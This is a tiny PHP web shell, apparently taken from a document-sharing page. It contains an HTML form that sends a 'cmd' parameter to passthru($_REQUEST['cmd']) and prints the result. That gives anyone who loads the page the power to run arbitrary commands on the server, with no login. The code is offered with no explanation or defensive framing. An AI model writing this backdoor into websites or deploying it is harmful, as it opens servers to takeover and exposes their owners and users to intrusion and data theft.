You are on page 1of 1

<form action="" method="get">

Command: <input type="text" name="cmd" /><input type="submit" value="Exec" />


</form>
Output:<br />
<pre><?php passthru($_REQUEST['cmd'], $result); ?></pre>

You might also like